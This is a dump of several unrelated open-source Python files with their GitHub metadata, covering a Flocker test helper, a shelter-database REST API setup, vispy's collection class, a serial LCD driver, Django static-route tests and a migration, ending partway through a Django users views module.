return self.number * self.paginator.per_page
|
{
"content_hash": "8097b128907f6f141200217efd740e51",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 91,
"avg_line_length": 31.805405405405406,
"alnum_prop": 0.592794017675051,
"repo_name": "elky/django",
"id": "b07be513d39def3c7132aed0de241192caaf1f83",
"size": "5884",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "django/core/paginator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "55975"
},
{
"name": "HTML",
"bytes": "219349"
},
{
"name": "JavaScript",
"bytes": "252940"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "12100085"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
"""
Testing utilities for ``flocker.node``.
"""
import os
import pwd
import socket
from unittest import skipIf
from contextlib import closing
from uuid import uuid4
from zope.interface import implementer
from characteristic import attributes
from twisted.trial.unittest import TestCase
from twisted.internet.defer import succeed
from zope.interface.verify import verifyObject
from eliot import Logger, ActionType
from ._docker import BASE_DOCKER_API_URL
from . import IDeployer, IStateChange, sequentially
from ..testtools import loop_until
from ..control import (
IClusterStateChange, Node, NodeState, Deployment, DeploymentState)
from ..control._model import ip_to_uuid
DOCKER_SOCKET_PATH = BASE_DOCKER_API_URL.split(':/')[-1]
def docker_accessible():
"""
Attempt to connect to the Docker control socket.
This may address https://clusterhq.atlassian.net/browse/FLOC-85.
:return: A ``bytes`` string describing the reason Docker is not
accessible or ``None`` if it appears to be accessible.
"""
try:
with closing(socket.socket(family=socket.AF_UNIX)) as docker_socket:
docker_socket.connect(DOCKER_SOCKET_PATH)
except socket.error as e:
return os.strerror(e.errno)
return None
_docker_reason = docker_accessible()
if_docker_configured = skipIf(
_docker_reason,
"User {!r} cannot access Docker via {!r}: {}".format(
pwd.getpwuid(os.geteuid()).pw_name,
DOCKER_SOCKET_PATH,
_docker_reason,
))
def wait_for_unit_state(docker_client, unit_name, expected_activation_states):
"""
Wait until a unit is in the requested state.
:param docker_client: A ``DockerClient`` instance.
:param unicode unit_name: The name of the unit.
:param expected_activation_states: Activation states to wait for.
:return: ``Deferred`` that fires when required state has been reached.
"""
def is_in_states(units):
for unit in units:
if unit.name == unit_name:
if unit.activation_state in expected_activation_states:
return True
def check_if_in_states():
responded = docker_client.list()
responded.addCallback(is_in_states)
return responded
return loop_until(check_if_in_states)
CONTROLLABLE_ACTION_TYPE = ActionType(u"test:controllableaction", [], [])
@implementer(IStateChange)
@attributes(['result'])
class ControllableAction(object):
"""
``IStateChange`` whose results can be controlled.
"""
called = False
deployer = None
_logger = Logger()
@property
def eliot_action(self):
return CONTROLLABLE_ACTION_TYPE(self._logger)
def run(self, deployer):
self.called = True
self.deployer = deployer
return self.result
@implementer(IDeployer)
class DummyDeployer(object):
"""
A non-implementation of ``IDeployer``.
"""
hostname = u"127.0.0.1"
node_uuid = uuid4()
def discover_state(self, node_stat):
return succeed(())
def calculate_changes(self, desired_configuration, cluster_state):
return sequentially(changes=[])
@implementer(IDeployer)
class ControllableDeployer(object):
"""
``IDeployer`` whose results can be controlled.
"""
def __init__(self, hostname, local_states, calculated_actions):
self.node_uuid = ip_to_uuid(hostname)
self.hostname = hostname
self.local_states = local_states
self.calculated_actions = calculated_actions
self.calculate_inputs = []
def discover_state(self, node_state):
return self.local_states.pop(0).addCallback(lambda val: (val,))
def calculate_changes(self, desired_configuration, cluster_state):
self.calculate_inputs.append(
(cluster_state.get_node(uuid=self.node_uuid,
hostname=self.hostname),
desired_configuration, cluster_state))
return self.calculated_actions.pop(0)
# A deployment with no information:
EMPTY = Deployment(nodes=[])
EMPTY_STATE = DeploymentState()
def ideployer_tests_factory(fixture):
"""
Create test case for IDeployer implementation.
:param fixture: Callable that takes ``TestCase`` instance and returns
a ``IDeployer`` provider.
:return: ``TestCase`` subclass that will test the given fixture.
"""
class IDeployerTests(TestCase):
"""
Tests for ``IDeployer``.
"""
def test_interface(self):
"""
The object claims to provide the interface.
"""
self.assertTrue(verifyObject(IDeployer, fixture(self)))
def _discover_state(self):
"""
Create a deployer using the fixture and ask it to discover state.
:return: The return value of the object's ``discover_state``
method.
"""
deployer = fixture(self)
result = deployer.discover_state(NodeState(hostname=b"10.0.0.1"))
return result
def test_discover_state_list_result(self):
"""
The object's ``discover_state`` method returns a ``Deferred`` that
fires with a ``list``.
"""
def discovered(changes):
self.assertEqual(tuple, type(changes))
return self._discover_state().addCallback(discovered)
def test_discover_state_iclusterstatechange(self):
"""
The elements of the ``list`` that ``discover_state``\ 's
``Deferred`` fires with provide ``IClusterStateChange``.
"""
def discovered(changes):
wrong = []
for obj in changes:
if not IClusterStateChange.providedBy(obj):
wrong.append(obj)
if wrong:
template = (
"Some elements did not provide IClusterStateChange: {}"
)
self.fail(template.format(wrong))
return self._discover_state().addCallback(discovered)
def test_calculate_necessary_state_changes(self):
"""
The object's ``calculate_necessary_state_changes`` method returns a
``IStateChange`` provider.
"""
deployer = fixture(self)
result = deployer.calculate_changes(EMPTY, EMPTY_STATE)
self.assertTrue(verifyObject(IStateChange, result))
return IDeployerTests
def to_node(node_state):
"""
Convert a ``NodeState`` to a corresponding ``Node``.
:param NodeState node_state: Object to convert.
:return Node: Equivalent node.
"""
return Node(uuid=node_state.uuid, hostname=node_state.hostname,
applications=node_state.applications or [],
manifestations=node_state.manifestations or {})
def assert_calculated_changes_for_deployer(
case, deployer, node_state, node_config, nonmanifest_datasets,
additional_node_states, additional_node_config, expected_changes
):
"""
Assert that ``calculate_changes`` returns certain changes when it is
invoked with the given state and configuration.
:param TestCase case: The ``TestCase`` to use to make assertions (typically
the one being run at the moment).
:param IDeployer deployer: The deployer provider which will be asked to
calculate the changes.
:param NodeState node_state: The deployer will be asked to calculate
changes for a node that has this state.
:param Node node_config: The deployer will be asked to calculate changes
for a node with this desired configuration.
:param set nonmanifest_datasets: Datasets which will be presented as part
of the cluster state without manifestations on any node.
:param set additional_node_states: A set of ``NodeState`` for other nodes.
:param set additional_node_config: A set of ``Node`` for other nodes.
:param expected_changes: The ``IStateChange`` expected to be returned.
"""
cluster_state = DeploymentState(
nodes={node_state} | additional_node_states,
nonmanifest_datasets={
dataset.dataset_id: dataset
for dataset in nonmanifest_datasets
},
)
cluster_configuration = Deployment(
nodes={node_config} | additional_node_config,
)
changes = deployer.calculate_changes(
cluster_configuration, cluster_state,
)
case.assertEqual(expected_changes, changes)
|
{
"content_hash": "8f0a516bc3587ce609e62266f273a097",
"timestamp": "",
"source": "github",
"line_count": 266,
"max_line_length": 79,
"avg_line_length": 32.19548872180451,
"alnum_prop": 0.6387202241943017,
"repo_name": "1d4Nf6/flocker",
"id": "7158690e9aedd5430b05d4ba38dd170b5938da59",
"size": "8626",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "flocker/node/testtools.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2442948"
},
{
"name": "Ruby",
"bytes": "6401"
},
{
"name": "Shell",
"bytes": "3418"
}
],
"symlink_target": ""
}
|
# ***** BEGIN LICENSE BLOCK *****
# This file is part of Shelter Database.
# Copyright (c) 2016
# All rights reserved.
#
#
#
# ***** END LICENSE BLOCK *****
from bootstrap import app, manager
from web import models
from web import processors
# 'User' Web service
blueprint_user = manager.create_api_blueprint(models.User,
exclude_columns=['pwdhash'],
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
GET_SINGLE=[processors.auth_func],
GET_MANY=[processors.auth_func],
POST=[processors.auth_func,
processors.shelter_POST_preprocessor],
DELETE=[processors.auth_func]))
# 'Shelter' Web service
blueprint_shelter = manager.create_api_blueprint(models.Shelter,
exclude_columns=['user_id', 'responsible.pwdhash',
'responsible.email'],
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
POST=[processors.auth_func,
processors.shelter_POST_preprocessor],
DELETE=[processors.auth_func]))
# 'ShelterPicture' Web service
blueprint_shelter_picture = manager.create_api_blueprint(models.ShelterPicture,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Section' Web service
blueprint_section = manager.create_api_blueprint(models.Section,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Category' Web service
blueprint_category = manager.create_api_blueprint(models.Category,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Attribute' Web service
blueprint_attribute = manager.create_api_blueprint(models.Attribute,
methods=['GET', 'POST', 'PUT', 'DELETE'],
results_per_page = 10000000,
max_results_per_page = 10000000)
# 'AttributePicture' Web service
blueprint_attribute_picture = manager.create_api_blueprint(models.AttributePicture,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Value' Web service
blueprint_value = manager.create_api_blueprint(models.Value,
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
PUT_SINGLE=[processors.value_edit_preprocessor],
PUT_MANY=[processors.value_edit_preprocessor]
))
# 'Property' Web service
blueprint_property = manager.create_api_blueprint(models.Property,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'],
results_per_page = 10000000,
max_results_per_page = 10000000,
preprocessors=dict(
POST=[processors.auth_func,
processors.property_preprocessor],
PUT=[processors.auth_func,
processors.property_preprocessor],
DELETE=[processors.auth_func]))
# 'Page' Web service
blueprint_page = manager.create_api_blueprint(models.Page,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
# 'Translation' Web service
blueprint_translation = manager.create_api_blueprint(models.Translation,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
|
{
"content_hash": "dd59b4ac63ef5a2923bb6090eb935f01",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 83,
"avg_line_length": 37.791666666666664,
"alnum_prop": 0.5275633958103638,
"repo_name": "toggle-corp/shelter-database",
"id": "f06f0e9489e8faa9c175fabe55d2245ed5c3da68",
"size": "3676",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/web/views/api/shelter_api_v01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "215790"
},
{
"name": "HTML",
"bytes": "340201"
},
{
"name": "JavaScript",
"bytes": "502358"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "167958"
},
{
"name": "Shell",
"bytes": "1944"
}
],
"symlink_target": ""
}
|
"""
A collection is a container for several (optionally indexed) objects having
the same vertex structure (vtype) and same uniforms type (utype). A collection
allows to manipulate objects individually and each object can have its own set
of uniforms provided they are a combination of floats.
"""
import math
import numpy as np
from ...gloo import Texture2D, VertexBuffer, IndexBuffer
from . util import dtype_reduce
from . array_list import ArrayList
def next_power_of_2(n):
""" Return next power of 2 greater than or equal to n """
n -= 1 # greater than OR EQUAL TO n
shift = 1
while (n + 1) & n: # n+1 is not a power of 2 yet
n |= n >> shift
shift *= 2
return max(4, n + 1)
class Item(object):
"""
An item represent an object within a collection and is created on demand
when accessing a specific object of the collection.
"""
def __init__(self, parent, key, vertices, indices, uniforms):
"""
Create an item from an existing collection.
Parameters
----------
parent : Collection
Collection this item belongs to
key : int
Collection index of this item
vertices: array-like
Vertices of the item
indices: array-like
Indices of the item
uniforms: array-like
Uniform parameters of the item
"""
self._parent = parent
self._key = key
self._vertices = vertices
self._indices = indices
self._uniforms = uniforms
@property
def vertices(self):
return self._vertices
@vertices.setter
def vertices(self, data):
self._vertices[...] = np.array(data)
@property
def indices(self):
return self._indices
@indices.setter
def indices(self, data):
if self._indices is None:
raise ValueError("Item has no indices")
start = self._parent.vertices._items[self._key][0]
self._indices[...] = np.array(data) + start
@property
def uniforms(self):
return self._uniforms
@uniforms.setter
def uniforms(self, data):
if self._uniforms is None:
raise ValueError("Item has no associated uniform")
self._uniforms[...] = data
def __getitem__(self, key):
""" Get a specific uniforms value """
if key in self._vertices.dtype.names:
return self._vertices[key]
elif key in self._uniforms.dtype.names:
return self._uniforms[key]
else:
raise IndexError("Unknown key ('%s')" % key)
def __setitem__(self, key, value):
""" Set a specific uniforms value """
if key in self._vertices.dtype.names:
self._vertices[key] = value
elif key in self._uniforms.dtype.names:
self._uniforms[key] = value
else:
raise IndexError("Unknown key")
def __str__(self):
return "Item (%s, %s, %s)" % (self._vertices,
self._indices,
self._uniforms)
class BaseCollection(object):
def __init__(self, vtype, utype=None, itype=None):
# Vertices and type (mandatory)
self._vertices_list = None
self._vertices_buffer = None
# Vertex indices and type (optional)
self._indices_list = None
self._indices_buffer = None
# Uniforms and type (optional)
self._uniforms_list = None
self._uniforms_texture = None
# Make sure types are np.dtype (or None)
vtype = np.dtype(vtype) if vtype is not None else None
itype = np.dtype(itype) if itype is not None else None
utype = np.dtype(utype) if utype is not None else None
# Vertices type (mandatory)
# -------------------------
if vtype.names is None:
raise ValueError("vtype must be a structured dtype")
# Indices type (optional)
# -----------------------
if itype is not None:
if itype not in [np.uint8, np.uint16, np.uint32]:
raise ValueError("itype must be unsigned integer or None")
self._indices_list = ArrayList(dtype=itype)
# No program yet
self._programs = []
# Need to update buffers & texture
self._need_update = True
# Uniforms type (optional)
# -------------------------
if utype is not None:
if utype.names is None:
raise ValueError("utype must be a structured dtype")
# Convert types to lists (in case they were already dtypes) such
# that we can append new fields
vtype = eval(str(np.dtype(vtype)))
# We add a uniform index to access uniform data
vtype.append(('collection_index', np.float32))
vtype = np.dtype(vtype)
# Check utype is made of float32 only
utype = eval(str(np.dtype(utype)))
r_utype = dtype_reduce(utype)
if type(r_utype[0]) is not str or r_utype[2] != 'float32':
raise RuntimeError("utype cannot be reduced to float32 only")
# Make utype divisible by 4
# count = ((r_utype[1]-1)//4+1)*4
# Make utype a power of two
count = next_power_of_2(r_utype[1])
if (count - r_utype[1]) > 0:
utype.append(('__unused__', np.float32, count - r_utype[1]))
self._uniforms_list = ArrayList(dtype=utype)
self._uniforms_float_count = count
# Reserve some space in texture such that we have
# at least one full line
shape = self._compute_texture_shape(1)
self._uniforms_list.reserve(shape[1] / (count / 4))
# Last since utype may add a new field in vtype (collecion_index)
self._vertices_list = ArrayList(dtype=vtype)
# Record all types
self._vtype = np.dtype(vtype)
self._itype = np.dtype(itype) if itype is not None else None
self._utype = np.dtype(utype) if utype is not None else None
def __len__(self):
""" x.__len__() <==> len(x) """
return len(self._vertices_list)
@property
def vtype(self):
""" Vertices dtype """
return self._vtype
@property
def itype(self):
""" Indices dtype """
return self._itype
@property
def utype(self):
""" Uniforms dtype """
return self._utype
def append(self, vertices, uniforms=None, indices=None, itemsize=None):
"""
Parameters
----------
vertices : numpy array
An array whose dtype is compatible with self.vdtype
uniforms: numpy array
An array whose dtype is compatible with self.utype
indices : numpy array
An array whose dtype is compatible with self.idtype
All index values must be between 0 and len(vertices)
itemsize: int, tuple or 1-D array
If `itemsize is an integer, N, the array will be divided
into elements of size N. If such partition is not possible,
an error is raised.
If `itemsize` is 1-D array, the array will be divided into
elements whose succesive sizes will be picked from itemsize.
If the sum of itemsize values is different from array size,
an error is raised.
"""
# Vertices
# -----------------------------
vertices = np.array(vertices).astype(self.vtype).ravel()
vsize = self._vertices_list.size
# No itemsize given
# -----------------
if itemsize is None:
index = 0
count = 1
# Uniform itemsize (int)
# ----------------------
elif isinstance(itemsize, int):
count = len(vertices) / itemsize
index = np.repeat(np.arange(count), itemsize)
# Individual itemsize (array)
# ---------------------------
elif isinstance(itemsize, (np.ndarray, list)):
count = len(itemsize)
index = np.repeat(np.arange(count), itemsize)
else:
raise ValueError("Itemsize not understood")
if self.utype:
vertices["collection_index"] = index + len(self)
self._vertices_list.append(vertices, itemsize)
# Indices
# -----------------------------
if self.itype is not None:
# No indices given (-> automatic generation)
if indices is None:
indices = vsize + np.arange(len(vertices))
self._indices_list.append(indices, itemsize)
# Indices given
# FIXME: variables indices (list of list or ArrayList)
else:
if itemsize is None:
I = np.array(indices) + vsize
elif isinstance(itemsize, int):
I = vsize + (np.tile(indices, count) +
itemsize * np.repeat(np.arange(count), len(indices))) # noqa
else:
raise ValueError("Indices not compatible with items")
self._indices_list.append(I, len(indices))
# Uniforms
# -----------------------------
if self.utype:
if uniforms is None:
uniforms = np.zeros(count, dtype=self.utype)
else:
uniforms = np.array(uniforms).astype(self.utype).ravel()
self._uniforms_list.append(uniforms, itemsize=1)
self._need_update = True
def __delitem__(self, index):
""" x.__delitem__(y) <==> del x[y] """
# Deleting one item
if isinstance(index, int):
if index < 0:
index += len(self)
if index < 0 or index > len(self):
raise IndexError("Collection deletion index out of range")
istart, istop = index, index + 1
# Deleting several items
elif isinstance(index, slice):
istart, istop, _ = index.indices(len(self))
if istart > istop:
istart, istop = istop, istart
if istart == istop:
return
# Deleting everything
elif index is Ellipsis:
istart, istop = 0, len(self)
# Error
else:
raise TypeError("Collection deletion indices must be integers")
vsize = len(self._vertices_list[index])
if self.itype is not None:
del self._indices_list[index]
self._indices_list[index:] -= vsize
if self.utype:
self._vertices_list[index:]["collection_index"] -= istop - istart
del self._vertices_list[index]
if self.utype is not None:
del self._uniforms_list[index]
self._need_update = True
def __getitem__(self, key):
""" """
# WARNING
# Here we want to make sure to use buffers and texture (instead of
# lists) since only them are aware of any external modification.
if self._need_update:
self._update()
V = self._vertices_buffer
I = None
U = None
if self._indices_list is not None:
I = self._indices_buffer
if self._uniforms_list is not None:
U = self._uniforms_texture.data.ravel().view(self.utype)
# Getting a whole field
if isinstance(key, str):
# Getting a named field from vertices
if key in V.dtype.names:
return V[key]
# Getting a named field from uniforms
elif U is not None and key in U.dtype.names:
# Careful, U is the whole texture that can be bigger than list
# return U[key]
return U[key][:len(self._uniforms_list)]
else:
raise IndexError("Unknown field name ('%s')" % key)
# Getting individual item
elif isinstance(key, int):
vstart, vend = self._vertices_list._items[key]
vertices = V[vstart:vend]
indices = None
uniforms = None
if I is not None:
istart, iend = self._indices_list._items[key]
indices = I[istart:iend]
if U is not None:
ustart, uend = self._uniforms_list._items[key]
uniforms = U[ustart:uend]
return Item(self, key, vertices, indices, uniforms)
# Error
else:
raise IndexError("Cannot get more than one item at once")
def __setitem__(self, key, data):
""" x.__setitem__(i, y) <==> x[i]=y """
# if len(self._programs):
# found = False
# for program in self._programs:
# if key in program.hooks:
# program[key] = data
# found = True
# if found: return
# WARNING
# Here we want to make sure to use buffers and texture (instead of
# lists) since only them are aware of any external modification.
if self._need_update:
self._update()
V = self._vertices_buffer
I = None
U = None
if self._indices_list is not None:
I = self._indices_buffer # noqa
if self._uniforms_list is not None:
U = self._uniforms_texture.data.ravel().view(self.utype)
# Setting a whole field
if isinstance(key, str):
# Setting a named field in vertices
if key in self.vtype.names:
V[key] = data
# Setting a named field in uniforms
elif self.utype and key in self.utype.names:
# Careful, U is the whole texture that can be bigger than list
# U[key] = data
U[key][:len(self._uniforms_list)] = data
else:
raise IndexError("Unknown field name ('%s')" % key)
# # Setting individual item
# elif isinstance(key, int):
# #vstart, vend = self._vertices_list._items[key]
# #istart, iend = self._indices_list._items[key]
# #ustart, uend = self._uniforms_list._items[key]
# vertices, indices, uniforms = data
# del self[key]
# self.insert(key, vertices, indices, uniforms)
else:
raise IndexError("Cannot set more than one item")
def _compute_texture_shape(self, size=1):
""" Compute uniform texture shape """
# We should use this line but we may not have a GL context yet
# linesize = gl.glGetInteger(gl.GL_MAX_TEXTURE_SIZE)
linesize = 1024
count = self._uniforms_float_count
cols = linesize // float(count / 4)
rows = max(1, int(math.ceil(size / float(cols))))
shape = rows, cols * (count / 4), count
self._ushape = shape
return shape
def _update(self):
""" Update vertex buffers & texture """
if self._vertices_buffer is not None:
self._vertices_buffer.delete()
self._vertices_buffer = VertexBuffer(self._vertices_list.data)
if self.itype is not None:
if self._indices_buffer is not None:
self._indices_buffer.delete()
self._indices_buffer = IndexBuffer(self._indices_list.data)
if self.utype is not None:
if self._uniforms_texture is not None:
self._uniforms_texture.delete()
# We take the whole array (_data), not the data one
texture = self._uniforms_list._data.view(np.float32)
size = len(texture) / self._uniforms_float_count
shape = self._compute_texture_shape(size)
# shape[2] = float count is only used in vertex shader code
texture = texture.reshape(shape[0], shape[1], 4)
self._uniforms_texture = Texture2D(texture)
self._uniforms_texture.data = texture
self._uniforms_texture.interpolation = 'nearest'
if len(self._programs):
for program in self._programs:
program.bind(self._vertices_buffer)
if self._uniforms_list is not None:
program["uniforms"] = self._uniforms_texture
program["uniforms_shape"] = self._ushape
|
{
"content_hash": "b95b21aba4eb917f6d6ae7a845811e2f",
"timestamp": "",
"source": "github",
"line_count": 490,
"max_line_length": 94,
"avg_line_length": 33.487755102040815,
"alnum_prop": 0.5448839051739899,
"repo_name": "ghisvail/vispy",
"id": "8f7381d8a6f23248fb4594516e0b55e7d3138591",
"size": "16708",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vispy/visuals/collections/base_collection.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "143081"
},
{
"name": "GLSL",
"bytes": "195460"
},
{
"name": "JavaScript",
"bytes": "5007"
},
{
"name": "Makefile",
"bytes": "1638"
},
{
"name": "PowerShell",
"bytes": "1359"
},
{
"name": "Python",
"bytes": "2551236"
}
],
"symlink_target": ""
}
|
import serial
import time
lcd = serial.Serial("/dev/serial/by-id/usb-Silicon_Labs_CP2102_USB_to_UART_Bridge_Controller_0001-if00-port0", 9600,
serial.EIGHTBITS,
serial.PARITY_NONE,
serial.STOPBITS_ONE,
timeout=5,
rtscts = False)
#time.sleep(0.1)
wait = 0.04
def BacklightOff():
command = ["\xFE","\x46","\xFE","\x46"]
for item in command:
lcd.write(item)
#time.sleep(wait)
def BacklightOn():
command = ["\xFE","\x42","\x00","\xFE","\x42","\x00"]
for item in command:
lcd.write(item)
time.sleep(wait)
#This function writes the date to the lines passed in as a parameter eg Writeline("This is a test","1")
#will write "This is a test" to line 1. If the data is "$blank" it will print a blank line on the display.
#The string has to be 16 characters if it is not the funtion will pad spaces after it. If it is too long
#it will trim it. If an invalid line is specified it assumes line 1.
def Writeline(data,line):
if data == "$blank":
data =" "
elif line == "1":
line = "\x01"
elif line == "2":
line = "\x02"
elif line != "1" or "2":
line = "1"
import string
data = data.ljust(16)
data = data [:16]
command = ["\xFE","\x47","\x01",line,data]
for item in command:
lcd.write(item)
time.sleep(wait)
|
{
"content_hash": "682b390e3163a418c76ae209170c5d5a",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 116,
"avg_line_length": 30.73913043478261,
"alnum_prop": 0.5827439886845828,
"repo_name": "oskarer/pi-boombox",
"id": "b94a3655518645f4d0608f98891b029e74c1be62",
"size": "1437",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "driver.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1507"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from netdevice.tests import create_router
from static.models import ipv6_static, ipv4_static
def create_v4_static(test_router, network):
v4_route = ipv4_static.objects.create(router=test_router,
network=network,
cidr=16,
next_hop='172.16.0.1',
)
return v4_route
def create_v6_static(test_router, network):
v6_route = ipv6_static.objects.create(router=test_router,
network=network,
cidr=48,
next_hop='2001:db8::1',
)
return v6_route
class StaticViewTest(TestCase):
def setUp(self):
self.client.force_login(User.objects.get_or_create(username='testuser')[0])
def test_config_view_with_a_single_ios_static_route(self):
"""
Create an IOS router, interface, and IP addresses, then check the configuration template output.
"""
test_router = create_router('ios')
test_v4_route = create_v4_static(test_router, '10.0.0.0')
test_v6_route = create_v6_static(test_router, '2001:db8:100::')
response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'ip route 10.0.0.0 255.255.0.0 172.16.0.1')
self.assertContains(response, 'ipv6 route 2001:db8:100::/48 2001:db8::1')
def test_config_view_with_junos_static_route(self):
"""
Create a JunOS router, interface, and IP addresses, then check the configuration template output.
"""
test_router = create_router('junos')
test_v4_route = create_v4_static(test_router, '10.0.0.0')
test_v6_route = create_v6_static(test_router, '2001:db8:100::')
response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'route 10.0.0.0/16 next-hop 172.16.0.1')
self.assertContains(response, 'route 2001:db8:100::/48 next-hop 2001:db8::1')
def test_config_view_with_multiple_ios_static_route(self):
"""
Create 100 static routes, and ensure they are templated properly.
"""
test_router = create_router('ios')
route_count = 100
for i in range(1, route_count):
create_v4_static(test_router, '10.' + str(i) + '.0.0')
create_v6_static(test_router, '2001:db8:' + str(i) + '::')
response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
self.assertEqual(response.status_code, 200)
for i in range(1, route_count):
self.assertContains(response, 'ip route 10.' + str(i) + '.0.0 255.255.0.0 172.16.0.1')
self.assertContains(response, 'ipv6 route 2001:db8:' + str(i) + '::/48 2001:db8::1')
def test_config_view_with_multiple_junos_static_route(self):
"""
Create 100 static routes, and ensure they are templated properly.
"""
test_router = create_router('junos')
route_count = 100
for i in range(1, route_count):
create_v4_static(test_router, '10.' + str(i) + '.0.0')
create_v6_static(test_router, '2001:db8:' + str(i) + '::')
response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
self.assertEqual(response.status_code, 200)
for i in range(1, route_count):
self.assertContains(response, 'route 10.' + str(i) + '.0.0/16 next-hop 172.16.0.1')
self.assertContains(response, 'route 2001:db8:' + str(i) + '::/48 next-hop 2001:db8::1')
def test_create_ipv6_static_route_form_view(self):
"""
Create a router, then test that the create a static route page view is displayed correctly.
"""
test_router = create_router('junos')
response = self.client.get(reverse('static:ipv6_static_create', kwargs={'router_id': test_router.id}))
self.assertEqual(response.status_code, 200)
def test_create_ipv4_static_route_form_view(self):
"""
Create a router, then test that the create a static route page view is displayed correctly.
"""
test_router = create_router('junos')
response = self.client.get(reverse('static:ipv4_static_create', kwargs={'router_id': test_router.id}))
self.assertEqual(response.status_code, 200)
def test_edit_ipv6_static_route_form_view(self):
"""
Create a router, and static route, then check that the edit form view is displayed correctly.
"""
test_router = create_router('junos')
static_route = create_v6_static(test_router, '2001:db8:1::')
response = self.client.get(reverse('static:ipv6_static_edit', kwargs={'ipv6_static_id': static_route.id}))
self.assertEqual(response.status_code, 200)
def test_edit_ipv4_static_route_form_view(self):
"""
Create a router, and static route, then check that the edit form view is displayed correctly.
"""
test_router = create_router('junos')
static_route = create_v4_static(test_router, '192.0.2.0')
response = self.client.get(reverse('static:ipv4_static_edit', kwargs={'ipv4_static_id': static_route.id}))
self.assertEqual(response.status_code, 200)
|
{
"content_hash": "ab8557aa22d7f96252102cb492ae7d64",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 124,
"avg_line_length": 43.80882352941177,
"alnum_prop": 0.5845921450151057,
"repo_name": "lkmhaqer/gtools-python",
"id": "e2d8501e296b6e9647fbef07307cd592d333ad9e",
"size": "5983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "static/tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2543"
},
{
"name": "HTML",
"bytes": "24530"
},
{
"name": "Python",
"bytes": "123398"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ideascale', '0007_auto_20150429_1503'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='comments',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='comment',
name='negative_votes',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='comment',
name='positive_votes',
field=models.PositiveIntegerField(),
),
migrations.AlterField(
model_name='idea',
name='comments',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='idea',
name='negative_votes',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='idea',
name='positive_votes',
field=models.PositiveIntegerField(null=True),
),
]
|
{
"content_hash": "c6066bce6c18cd933aec37e558ba1290",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 57,
"avg_line_length": 28.162790697674417,
"alnum_prop": 0.5565648224607762,
"repo_name": "joausaga/social-ideation",
"id": "86d768d6545c98710c4e534dd5543b0148e584c8",
"size": "1235",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "ideascale/migrations/0008_auto_20150429_2247.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1411"
},
{
"name": "HTML",
"bytes": "26382"
},
{
"name": "JavaScript",
"bytes": "986"
},
{
"name": "Python",
"bytes": "389664"
},
{
"name": "Shell",
"bytes": "1284"
}
],
"symlink_target": ""
}
|
import functools
import json
import urlparse
from django import http
from django.conf import settings
from django.contrib import auth
from django.db import transaction
from django.shortcuts import get_object_or_404
from django.template.response import TemplateResponse
from django.utils.http import is_safe_url
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
import commonware.log
import waffle
from django_browserid import BrowserIDBackend, get_audience
from django_statsd.clients import statsd
from requests_oauthlib import OAuth2Session
from tower import ugettext as _
import amo
from amo.utils import escape_all, log_cef
from lib.metrics import record_action
from mkt.site.decorators import json_view, login_required
from .models import UserProfile
from .signals import logged_out
from .utils import autocreate_username
log = commonware.log.getLogger('z.users')
def user_view(f):
@functools.wraps(f)
def wrapper(request, user_id, *args, **kw):
"""Provides a user object given a user ID or username."""
if user_id.isdigit():
key = 'id'
else:
key = 'username'
# If the username is `me` then show the current user's profile.
if (user_id == 'me' and request.user.is_authenticated() and
request.user.username):
user_id = request.user.username
user = get_object_or_404(UserProfile, **{key: user_id})
return f(request, user, *args, **kw)
return wrapper
@login_required(redirect=False)
@json_view
def ajax(request):
